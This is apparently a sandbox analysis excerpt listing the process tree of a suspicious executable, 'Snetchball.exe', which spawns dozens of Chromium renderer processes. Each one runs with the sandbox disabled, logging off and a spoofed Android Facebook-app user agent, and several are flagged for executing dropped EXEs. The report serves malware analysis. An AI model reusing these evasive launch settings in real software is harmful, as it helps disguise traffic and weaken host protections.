C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3760 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:1436 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4080 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:3464 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4100 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:1788 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4152 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:5612 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4160 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:3856 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4188 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:4060 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4124 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:2116 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4160 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:5180 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=1416 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:2956 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=1284 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:1452 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3996 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:3276 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4052 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:3084 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4160 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:4924 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=4148 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:4716 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=3956 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:3656 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=4036 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:1792 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
The 39 renderer processes listed below were all started from this image with the same command line; only --renderer-client-id, --mojo-platform-channel-handle and the PID differ between them (shown as <id> and <handle>):

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=<id> --mojo-platform-channel-handle=<handle> --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19

renderer-client-id   mojo-platform-channel-handle   PID    Signature
28                   4124                           1044   Executes dropped EXE
29                   4128                           5064   Executes dropped EXE
30                   3824                           196    Executes dropped EXE
31                   4012                           4708
32                   4276                           2208
33                   1108                           2096
34                   3976                           108
35                   3220                           5204
36                   3164                           5560
37                   3844                           988
38                   2588                           5260
39                   4216                           5376
40                   4200                           4216
41                   4168                           4380
42                   4052                           5876
43                   4140                           3688
44                   1204                           5420
45                   4136                           1612
46                   4052                           6084
47                   4076                           6020
48                   3816                           6052
49                   3964                           4204
50                   4128                           3376
51                   3852                           3976
52                   3220                           2360
53                   4116                           5100
54                   3156                           456
55                   3816                           5776
56                   4112                           1056
57                   4020                           5560
58                   4176                           1520
59                   4140                           988
60                   3720                           896
61                   3796                           5376
62                   4264                           5328
63                   1932                           2272
64                   4148                           4944
65                   3760                           4932
66                   1964                           2348
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=4108 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2116
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=1108 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5688
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=4052 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1128
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=1416 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4276
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=3840 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2580
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --mojo-platform-channel-handle=4036 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4220
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --mojo-platform-channel-handle=4172 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2884
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --mojo-platform-channel-handle=4296 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5556
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --mojo-platform-channel-handle=3720 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5384
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --mojo-platform-channel-handle=4344 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2084
-
